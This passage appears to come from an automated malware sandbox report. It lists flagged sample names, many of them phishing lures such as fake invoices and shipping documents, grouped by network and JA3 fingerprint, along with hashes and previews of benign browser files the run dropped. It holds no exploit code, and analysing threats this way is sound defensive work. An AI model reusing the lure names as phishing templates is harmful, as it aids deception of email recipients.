	1233.exe	Get hash	malicious	Browse	184.30.24.22
	Server.exe	Get hash	malicious	Browse	184.30.24.22
	2200.dll	Get hash	malicious	Browse	184.30.24.22
	mon48_cr.dll	Get hash	malicious	Browse	184.30.24.22
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	92.122.253.103
	Wh102yYa..dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	2.20.86.97
	8.prtyok.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	104.84.56.24

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	104.20.184.68
	B62672021 PRETORIA.doc	Get hash	malicious	Browse	104.21.45.223
	NJPcHPuRcG.dll	Get hash	malicious	Browse	104.20.184.68
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	104.20.184.68
	13xakh1PtD.dll	Get hash	malicious	Browse	104.20.184.68
	RFQ.xls	Get hash	malicious	Browse	104.20.139.65
	DUcKsYsyX0.dll	Get hash	malicious	Browse	104.20.184.68
	RI51uAIUyL.dll	Get hash	malicious	Browse	104.20.184.68
	IVJq3tVi96.exe	Get hash	malicious	Browse	104.21.19.200
	Doc0538-2-21.xls	Get hash	malicious	Browse	104.20.138.65
	COTIZACI#U00d3N.exe	Get hash	malicious	Browse	104.21.19.200
	REQUEST FOR QOUTATION.exe	Get hash	malicious	Browse	104.21.19.200
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	162.159.133.233
	Shipping Documents Original BL, Invoice & Packing List.exe	Get hash	malicious	Browse	172.67.188.154
	aS94x3Qp1s.exe	Get hash	malicious	Browse	104.21.19.200
	Purchase Order.xlsx	Get hash	malicious	Browse	172.67.8.238
	attched file.exe	Get hash	malicious	Browse	162.159.135.233
	Factura.exe	Get hash	malicious	Browse	172.67.188.154
	CT_0059361.exe	Get hash	malicious	Browse	172.67.188.154
	scan-021521DHL delivery.doc	Get hash	malicious	Browse	104.21.19.200
FASTLYUS	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	151.101.1.44
	NJPcHPuRcG.dll	Get hash	malicious	Browse	151.101.1.44
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	151.101.1.44
	13xakh1PtD.dll	Get hash	malicious	Browse	151.101.1.44
	DUcKsYsyX0.dll	Get hash	malicious	Browse	151.101.1.44
	7eec14e7cec4dc93fbf53e08998b2340.exe	Get hash	malicious	Browse	185.199.111.133
	RI51uAIUyL.dll	Get hash	malicious	Browse	151.101.1.44
	ransomware.exe	Get hash	malicious	Browse	151.101.66.159
	07oof4WcEB.exe	Get hash	malicious	Browse	185.199.110.133
	03728d6617cd13b19bd69625f7ead202.exe	Get hash	malicious	Browse	185.199.111.133
	PO 20191003.exe	Get hash	malicious	Browse	185.199.111.133
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	151.101.1.44
	mon44_cr.dll	Get hash	malicious	Browse	151.101.1.44
	mon41_cr.dll	Get hash	malicious	Browse	151.101.1.44
	mon4498.dll	Get hash	malicious	Browse	151.101.1.44
	e888888888.dll	Get hash	malicious	Browse	151.101.1.44
	Project.pdf.exe	Get hash	malicious	Browse	151.101.1.195
	1233.exe	Get hash	malicious	Browse	151.101.1.44
	Server.exe	Get hash	malicious	Browse	151.101.1.44
	via-1.3.1-win.exe	Get hash	malicious	Browse	185.199.111.154
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	34.65.144.159
	NJPcHPuRcG.dll	Get hash	malicious	Browse	34.65.144.159
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	34.65.144.159
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	SecuriteInfo.com.BehavesLike.Win32.Emotet.jc.exe	Get hash	malicious	Browse	34.65.61.179
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	oHqMFmPndx.exe	Get hash	malicious	Browse	34.119.201.254
	Documentation__EG382U8V.doc	Get hash	malicious	Browse	34.67.99.22
	#Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htm	Get hash	malicious	Browse	34.101.72.248
	#Ud83c#Udfb6 03 November, 2020 prodriguez@fnbsm.com.wavv.htm	Get hash	malicious	Browse	34.101.72.248
	http://49.120.66.34.bc.googleusercontent.com/osh?email=bob@microsoft.com	Get hash	malicious	Browse	34.66.120.49
	SecuriteInfo.com.Heur.13242.doc	Get hash	malicious	Browse	34.67.97.45
	8845_2020_09_29.doc	Get hash	malicious	Browse	34.67.97.45
	QgpyVFbQ7w.exe	Get hash	malicious	Browse	34.65.231.1
	qySMTADEjr.exe	Get hash	malicious	Browse	34.65.231.1
	SecuriteInfo.com.Trojan.Siggen10.9113.10424.exe	Get hash	malicious	Browse	34.65.231.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	NJPcHPuRcG.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	13xakh1PtD.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	DUcKsYsyX0.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	7eec14e7cec4dc93fbf53e08998b2340.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	RI51uAIUyL.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	L257MJZ0TP.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	brewin-02-02-21 Statement_763108amFtZXMubXV0aW1lcg==.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	658908343Bel.html	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	P178979.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	03728d6617cd13b19bd69625f7ead202.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	PO 20191003.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	SecuriteInfo.com.Trojan.GenericKD.36134277.347.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	mon44_cr.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	mon41_cr.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	mon4498.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	e888888888.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3456
Entropy (8bit):	4.918959247422732
Encrypted:	false
SSDEEP:	96:5hhuhzzsnzz8z333mmmmmV4TmV4TmVBjCmVBjC9mVBjCmVBjCYmVBjCo:9FlFCT
MD5:	914C0B18BC03E6C4E22926FB7F3D0934
SHA1:	4907DA2B852B908C8BB4C83DC66675B45B1A625E
SHA-256:	70B5FE8346DDE5AEC2B183A40A78D504793508355B423A2611A47EA95C247B34
SHA-512:	B153CD4D11F48FB3C4261BC0D8F1E4C22C46D75CFB67E81DC523CD78A226821D38CAE1EDAF9F84F6F4ACABD038CC5B66BEB8BB9675C4381C37A74541A354F3C4
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /><item name="mntest" value="mntest" ltime="1425692880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /><item name="mntest" value="mntest" ltime="1425892880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /><item name="mntest" value="mntest" ltime="1428972880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><ro

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F499AAE-6FE9-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	106280
Entropy (8bit):	2.2643158250238193
Encrypted:	false
SSDEEP:	3072:Bo04F02T0ST0lT0BT0NT0290UT0qT0l90W90Z90gP0zT0xT0PP0TP0MP0/PO8PO/:Bo04F02T0ST0lT0BT0NT0290UT0qT0le
MD5:	60A4C05540136C1EBE77D6DF45863775
SHA1:	33AED884DB09782252EAC8B7682B7476E2E9298C
SHA-256:	EA1DAF5A07B167DC44F76911741018ECF8AC16542FCBF852DCDFD000C3D072DE
SHA-512:	0C8DF9733C60F4759C4FDA0F0B5A4A7B57F2A3BAF636D10C5FFD7BAF7B40F6D2AB4CB33B3382E3FCD0AA531517C101A86E1E84AA4D6C07CABEDF812DBA40AF38
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8F499AB0-6FE9-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	194958
Entropy (8bit):	3.5847035569441683
Encrypted:	false
SSDEEP:	3072:4Z/2BfcYmu5kLTzGtLZ/2Bfc/mu5kLTzGt5:xai
MD5:	EACFFBFFDFE1B8289692FF8AFA5D1BA7
SHA1:	1934377F000A44A16524ECBC2D50FC0653EC51F3
SHA-256:	0E85426046C7545253C9AC3E2749DAD549756C7630DA6C6A2DF2793979CADAED
SHA-512:	572A0B34F7BECDA1AE706B66E6EBD8BB0744226D31B57A63AC61E0E18A7EA6AB14FFCDABA6ED5954701F6C5050344E3C05DFDB9F83F2C832D32198096DE18680
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E3407C-6FE9-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9161627712752582
Encrypted:	false
SSDEEP:	96:rCZlQ567BSTjR2yW7M3ZS5NWBJs8ESm1S5NWXO5NWBJs8EiA:rCZlQ567kTjR2yW7M3ZXcSm1/jciA
MD5:	54B1BD50F47CC224E53759BA4FBD617F
SHA1:	1878BF1E537FBE26D6D5D25BBB9A77DF3897CF6C
SHA-256:	DB7C51AC1C7C4B2350076BAE6D0D07737A562D6F3A179AEA9764BCDFDB2E6FAD
SHA-512:	784388EC585F94364E182BB22CD3A68361E2CA2707755D64703ECD54FF81DE97DD788341F2C2816AEA5A89FD271EDBA106643C4818109FC7E7607FF435B22608
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E3407E-6FE9-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28152
Entropy (8bit):	1.9173576656143714
Encrypted:	false
SSDEEP:	96:roZ7Qv6tBSfjZ2+WYMIx/N4yhYVZjD2ks/Nf14yhYVZjCA:roZ7Qv6tkfjZ2+WYMIxuySjKlAySjCA
MD5:	E8BEE74CC905B34ABAEF35501069223B
SHA1:	7C537AA9214D4CB66B5C2184A1911A92FDEC761E
SHA-256:	AF40EE958AC5E55BBD0B9F240FD3FE4783FBA184BA3B60A8591E6A3E12A7E4F2
SHA-512:	0FCCA420620998691DFBF37B6A847DC24B8C90E7EC95D275D60023551598623BB9EEFBE18D5F838308CD68F190CFA76CBD291B5E4E79EE2415040C312A3D23D5
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E34080-6FE9-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28696
Entropy (8bit):	1.9162549240413231
Encrypted:	false
SSDEEP:	192:rgZDQL6mkljeq2soWI9MjsR8PktsBtEM8BPktsBIr:rQMOnBQw9IsE4PGE4g
MD5:	B67F2B77E558B521016FFBC1D4340618
SHA1:	1D6B1B06A421F244A0767A65842A35E37BC0FE24
SHA-256:	442A06440C8DC96604C47EB641D8D2052C4CEADC83B9AAF12CA4F584961C2D53
SHA-512:	1C9A645EC2E02C9F045BEB1805FA0A4AC67C400ADBA463CADEA49B01E20F7F8F7249B4E7B7A736855B1574037375EBEF7BB51FE022878449FA85F26B81C72CCD
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B1D25056-6FE9-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5825707586616589
Encrypted:	false
SSDEEP:	48:Iw91GcprXOGwpakG4pQYGrapbSfGQpKvG7HpRATGIpX2bGApm:r9rZXmQU6mBSJA+TUFag
MD5:	142AE331E82FFFCB2EA09C49CDF053A2
SHA1:	88B2A08DB3F97D2171734ADB536D17D8CB0864D3
SHA-256:	23F2C0326A4B51AC31AD4C7C8E9687A3162E9CDD4790E126CF1B7BD4F6B45375
SHA-512:	4B3F84CADFF8C1F167964A3F10B4E32306BD90AE7BF863081B5CE4E1081711FFBA3B54EA1180D7739B1644719EF76614990ACA9CE1E134A5CD064F414E693384
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.089202842179241
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEYQ+vbQ+gnWimI002EtM3MHdNMNxOEYQ+vbwnWimI00OYGVbkEtMb:2d6NxOBQ+jQ+gSZHKd6NxOBQ+jwSZ7Y3
MD5:	7D700464A669B453CF31B76C82DACD86
SHA1:	99503B8BFF4B7380C6C51423C52FDB4D6135FE33
SHA-256:	D361DB4B64482C20FCBA6E1C4209598BDD9D284511B9890056AA9884002E94F5
SHA-512:	3B2F99CD15A05FB2C8685BEC1C9275F757623630C590E8B10FDB8967CE8B0163BE0F14BED0D84A89A3F0A223494386318C4DDBBDAAA5156865DB9EA85332E5A0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x6614ba5d,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.115202570823737
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kYn2bnRnWimI002EtM3MHdNMNxe2kYn2bnRnWimI00OYGkak6EtMb:2d6NxrhWRSZHKd6NxrhWRSZ7Yza7b
MD5:	C4FF038286D2F359E706C246B1F4010A
SHA1:	F0D77F4F18B73162B2A012F1AA00F648DA72CF99
SHA-256:	5B89D0B13F81081E8FA57EA7058E93D0F31ACE483C7C38BB6E7AB15A25DA2A9F
SHA-512:	270417E2BDDE2A186285A6E578A02C8C56F91E018A2B95343EE23F6E1FEB0960AB84B8779EB8A3834716582A791F326B580A51D89C694EF5BD7EE997549F32F9
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x660d9379,0x01d703f6</date><accdate>0x660d9379,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x660d9379,0x01d703f6</date><accdate>0x660d9379,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.0781693515825586
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLYfbwnWimI002EtM3MHdNMNxvLYfbwnWimI00OYGmZEtMb:2d6NxvMzwSZHKd6NxvMzwSZ7Yjb
MD5:	4A9B691C563FFDE74E028DF1042282BB
SHA1:	06776F3FF211931B29426A6798E2DD708E2D40F5
SHA-256:	06F1B046037120DDDDDF59FC7E9D88E8A007F00E2B1B3889BBA1CBCE87565F12
SHA-512:	33448B7679B000A7CC1E7AB436990C58D6E4D78FCE3721BC3D4C79890A38B69148A109BC7C126454FCBB7FB9A89E33A1C1BF1C5663AD7C783F78D32D897D8135
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x66171ccb,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x66171ccb,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.1330177419790575
Encrypted:	false
SSDEEP:	12:TMHdNMNxiYOQ8GbOQ8BnWimI002EtM3MHdNMNxiYOQ8GbOQ8BnWimI00OYGd5Ety:2d6NxfOQXOQ8SZHKd6NxfOQXOQ8SZ7YE
MD5:	E22A8B0CAF6D74D2B4663D503EC7606A
SHA1:	51DB7EF01106703E4FB61F65A1B50212590C5AAB
SHA-256:	2C4122AAAF1812C1EFE847FE3CF7784F44BA39A08EB0EDD576C3A9365CAAC4B8
SHA-512:	D96200374476743E4FE663C07E59F1772FFF1C31329990C64F17B7857311188E98443B51615B560D2B3D4800725EB783C96128055DA65546F4039ACD68CB298F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x66125827,0x01d703f6</date><accdate>0x66125827,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x66125827,0x01d703f6</date><accdate>0x66125827,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.088157266355411
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwYfbwnWimI002EtM3MHdNMNxhGwYfbwnWimI00OYG8K075EtMb:2d6NxQNzwSZHKd6NxQNzwSZ7YrKajb
MD5:	0BEB7F85E96ED48F61E9CCBE91F893A8
SHA1:	B22DE3695ED3357577E283D33C25965139CA2E37
SHA-256:	D2627FD34678067C025A9068E5B1DA023B5A4A2058CD345CDF1A6D735615DEC2
SHA-512:	6DBCC786EBFD5569FC19E14A2BA8AA2E9842300A548C558EA3FE0517A363D256D03E9CA32AA657CED88EDBC5133C74FA8860430F7573BBF293AB84A000A780EA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x66171ccb,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x66171ccb,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.095725826610155
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nYQ+vbQ+gnWimI002EtM3MHdNMNx0nYQ+vbQ+gnWimI00OYGxEtMb:2d6Nx0YQ+jQ+gSZHKd6Nx0YQ+jQ+gSZ9
MD5:	D87B61F4D34120B04ABAAC1CCB69A969
SHA1:	66F031327230747F7D8D2B9E56BD9435D7CAD003
SHA-256:	C53898298FBBC9CC5D0D8F091C11AA3ECF079B37FD487797F3DE540ED2A418BC
SHA-512:	FF807C40671F616604562E8EEE46BFAC083AA86520E7DE2783E49904F67A385D9BA5C5C14DBDD0A8E1D49188C6FE31969367105D5C58C6B67D517CD8D5EE39C5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x6614ba5d,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x6614ba5d,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.134146549652052
Encrypted:	false
SSDEEP:	12:TMHdNMNxxYQ+vbQ+gnWimI002EtM3MHdNMNxxYQ+vbQ+gnWimI00OYG6Kq5EtMb:2d6NxqQ+jQ+gSZHKd6NxqQ+jQ+gSZ7YJ
MD5:	CE80DE78D2FABC99BD92F560E50FA26C
SHA1:	3B92EAE73DE9624E9E26E7786AAB9C64C009B99A
SHA-256:	E23061B43EB56D190B023FE76629727D21CE588F80B65F54F420B1A1AC63ADDC
SHA-512:	9EBE3688C2E9E0D9BEB185AE031E1080F484B84B64C57AE03AC0673296EEC9D264C156E16299A98A7A35B8AF229615D822E2589A46E73B4C152313EDA898A570
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x6614ba5d,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x6614ba5d,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.137109423909359
Encrypted:	false
SSDEEP:	12:TMHdNMNxcYOQ8GbOQ8BnWimI002EtM3MHdNMNxcYOQ8GbOQ8BnWimI00OYGVEtMb:2d6NxJOQXOQ8SZHKd6NxJOQXOQ8SZ7Y6
MD5:	E8A636ED26C3886502752F03E68A0955
SHA1:	AD7423682A90B229833218A1DF9C7AE43FAA0381
SHA-256:	54EC22025B9F53213BC55B661352E79183B7FF3D36D11954539634700AB953EA
SHA-512:	0582FD630C36387D4084BFEC78D0DA2A516D448FF052F8C49FCCF1CD43D512EAFFA9D72005D0AC844A18FA7BB508C748E09DFAE0CCBDCB49DF919882F9D9F5E5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x66125827,0x01d703f6</date><accdate>0x66125827,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x66125827,0x01d703f6</date><accdate>0x66125827,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.118143876878259
Encrypted:	false
